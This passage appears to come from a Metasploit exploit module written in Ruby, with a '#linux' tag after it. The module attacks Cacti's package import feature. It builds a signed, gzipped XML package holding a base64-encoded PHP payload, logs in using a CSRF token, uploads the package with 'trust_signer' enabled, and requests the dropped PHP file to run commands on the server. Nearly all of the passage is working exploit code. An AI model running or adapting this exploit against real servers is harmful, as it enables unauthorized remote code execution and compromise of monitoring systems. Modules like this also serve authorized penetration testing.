CheckCode::Appears  end  # Taken from modules/payloads/singles/php/exec.rb  def php_exec(cmd)    dis = '$' + rand_text_alpha(4..7)    shell = <<-END_OF_PHP_CODE    #{php_preamble(disabled_varname: dis)}    $c = base64_decode("#{Rex::Text.encode_base64(cmd)}");    #{php_system_block(cmd_varname: '$c', disabled_varname: dis)}    END_OF_PHP_CODE    Rex::Text.compress(shell)  end  def generate_package    @payload_path = "resource/#{rand_text_alphanumeric(5..10)}.php"    php_payload = target['Type'] == :php ? payload.encoded : php_exec(payload.encoded)    digest = OpenSSL::Digest.new('SHA256')    pkey = OpenSSL::PKey::RSA.new(2048)    file_signature = pkey.sign(digest, php_payload)    xml_data = <<~XML      <xml>         <files>            <file>               <name>#{@payload_path}</name>               <data>#{Rex::Text.encode_base64(php_payload)}</data>               <filesignature>#{Rex::Text.encode_base64(file_signature)}</filesignature>            </file>         </files>         <publickey>#{Rex::Text.encode_base64(pkey.public_key.to_pem)}</publickey>         <signature></signature>      </xml>    XML    signature = pkey.sign(digest, xml_data)    xml_data.sub!('<signature></signature>', "<signature>#{Rex::Text.encode_base64(signature)}</signature>")    Rex::Text.gzip(xml_data)  end  def upload_package    print_status('Uploading the package')    # Default parameters sent when importing packages from the web UI    # Randomizing these values might be suspicious    vars_form = {      '__csrf_magic' => @csrf_token,      'trust_signer' => 'on',      'data_source_profile' => '1',      'remove_orphans' => 'on',      'replace_svalues' => 'on',      'image_format' => '3',      'graph_height' => '200',      'graph_width' => '700',      'save_component_import' => '1',      'preview_only' => 'on',      'action' => 'save'    }    vars_form_data = []    vars_form.each do |name, data|      vars_form_data << { 'name' => name, 'data' => data }    end    vars_form_data << {      'name' => 'import_file',      'filename' => "#{rand_text_alphanumeric(5..10)}.xml.gz",      'content_type' => 'application/x-gzip',      'encoding' => 'binary',      'data' => generate_package    }    res = send_request_cgi(      'uri' => normalize_uri(target_uri.path, 'package_import.php'),      'method' => 'POST',      'keep_cookies' => true,      'vars_form_data' => vars_form_data    )    fail_with(Failure::Unreachable, 'Could not connect to the web server - no response when sending the preview import request') if res.nil?    fail_with(Failure::UnexpectedReply, "Unexpected response code (#{res.code}) when sending the preview import request") unless res.code == 200    html = res.get_html_document    local_path = html.xpath('//input[starts-with(@id, "chk_file")]/@title').text    fail_with(Failure::Unknown, 'Unable to import the package') if local_path.empty?    vars_form['preview_only'] = ''    res = send_request_cgi(      'uri' => normalize_uri(target_uri.path, 'package_import.php'),      'method' => 'POST',      'keep_cookies' => true,      'vars_post' => vars_form    )    fail_with(Failure::Unreachable, 'Could not connect to the web server - no response when importing the package') if res.nil?    fail_with(Failure::UnexpectedReply, "Unexpected response code when importing the package (#{res.code})") unless res.code == 302    local_path  end  def trigger_payload    # Expecting no response    print_status('Triggering the payload')    send_request_cgi({      'uri' => normalize_uri(target_uri.path, @payload_path),      'method' => 'GET'    }, 1)  end  def exploit    # Setting the `FETCH_DELETE` option seems to break the payload execution.    # `Msf::Exploit::FileDropper` will be used later to cleanup. Note that it    # is not possible to opt-out anymore.    fail_with(Failure::BadConfig, 'FETCH_DELETE must be set to false') if datastore['FETCH_DELETE']    unless @csrf_token      begin        @csrf_token = get_csrf_token      rescue CactiError => e        fail_with(Failure::NotFound, "Unable to get the CSRF token: #{e.class} - #{e}")      end    end    unless @logged_in      begin        do_login(datastore['USERNAME'], datastore['PASSWORD'], csrf_token: @csrf_token)      rescue CactiError => e        fail_with(Failure::NoAccess, "Login failure: #{e.class} - #{e}")      end    end    package_path = upload_package    register_file_for_cleanup(package_path)    # For fetch payloads, setting the `FETCH_DELETE` option seems to break the    # payload execution. Using `#register_file_for_cleanup` instead, since we    # know the local path.    if target['Type'] != :php && payload_instance.is_a?(Msf::Payload::Adapter::Fetch)      if File.absolute_path?(datastore['FETCH_FILENAME'])        register_file_for_cleanup(datastore['FETCH_FILENAME'])      else        register_file_for_cleanup(File.join(File.dirname(package_path), datastore['FETCH_FILENAME']))      end    end    trigger_payload  endend

Tag

#linux